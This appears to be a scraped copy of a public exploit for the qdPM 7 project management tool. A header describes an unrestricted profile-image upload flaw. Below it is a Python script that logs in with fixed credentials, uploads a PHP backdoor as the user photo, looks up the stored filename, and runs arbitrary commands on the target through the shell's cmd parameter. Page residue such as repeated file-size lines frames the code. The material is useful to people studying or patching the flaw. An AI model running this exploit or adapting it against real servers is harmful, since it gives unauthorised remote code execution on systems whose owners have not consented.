103 lines
No EOL
3.2 KiB
Python
Executable file
103 lines
No EOL
3.2 KiB
Python
Executable file
######################################################################################
|
|
# Exploit qdPM v.7 Arbitrary File upload
|
|
# Date: June 13th 2012
|
|
# Author: loneferret
|
|
# Version: 7
|
|
# Vendor Url: http://qdpm.net/
|
|
# Tested on: Winddows XP / XAMPP
|
|
######################################################################################
|
|
# Discovered by: loneferret
|
|
######################################################################################
|
|
|
|
# Software description:
|
|
# Free project management tool for small team
|
|
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
|
|
# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact
|
|
# using a Ticket System that is integrated into Task management.
|
|
|
|
# Vulnerability:
|
|
# Application does not verify the file's extension when uploading an image for a user's profile.
|
|
# Making it possible to upload a small php shell, and accessing it remotely.
|
|
|
|
# Note(s):
|
|
# One needs a valid user account to upload the file. (Client will do)
|
|
# No need to be authenticated to access the file.
|
|
|
|
# Uploading file:
|
|
# Once logged in, upload file here:
|
|
# Page: /qdPM/index.php/home/myAccount
|
|
|
|
# Access file:
|
|
# File can be found here:
|
|
# /qdPM/uploads/users/<filename>
|
|
#
|
|
# Note the filename will contain a random number. One need to
|
|
# to look at the source code from the browser to find it.
|
|
# For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" />
|
|
|
|
|
|
|
|
----- python script -----
|
|
#!/usr/bin/python
|
|
|
|
import re, mechanize
|
|
import urllib, sys
|
|
|
|
print "\n[*] qdPM v.7 Remote Code Execution"
|
|
print "[*] Vulnerability discovered by loneferret"
|
|
|
|
print "[*] Offensive Security - http://www.offensive-security.com\n"
|
|
if (len(sys.argv) != 3):
|
|
print "[*] Usage: poc.py <RHOST> <RCMD>"
|
|
exit(0)
|
|
|
|
rhost = sys.argv[1]
|
|
rcmd = sys.argv[2]
|
|
|
|
# Login into site
|
|
try:
|
|
print "[*] Loging in ."
|
|
br = mechanize.Browser()
|
|
br.open("http://%s/qdPM/index.php/home/login" % rhost)
|
|
assert br.viewing_html()
|
|
br.select_form(name="UsersForm")
|
|
br.select_form(nr=0)
|
|
br.form['login[email]'] = "loneferret@test.com"
|
|
br.form['login[password]'] = "123456"
|
|
print "[*] Hope this works"
|
|
br.submit()
|
|
|
|
except:
|
|
print "[*] Oups..."
|
|
exit(0)
|
|
|
|
# Upload malicious file
|
|
try:
|
|
print "[*] Uploading shell .."
|
|
br.open("http://%s/qdPM/home/myAccount" % rhost)
|
|
assert br.viewing_html()
|
|
br.select_form(name="UsersAccountForm")
|
|
br.select_form(nr=0)
|
|
br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]")
|
|
br.submit(nr=0)
|
|
|
|
except:
|
|
print "[-] Upload didn't work."
|
|
exit(0)
|
|
|
|
# Get file name once saved
|
|
try:
|
|
br.select_form(name="UsersAccountForm")
|
|
for form in br.forms():
|
|
filename = form.controls[9].value
|
|
print "[*] Filename is now: " + filename
|
|
|
|
url = "http://%s/qdPM/uploads/users " % rhost
|
|
url += "/%s?cmd=%s" % (filename,rcmd)
|
|
print "[*] Executing command:\n"
|
|
resp = urllib.urlopen(url)
|
|
print resp.read()
|
|
|
|
except:
|
|
print "[-] Oups..."
|
|
exit(0) |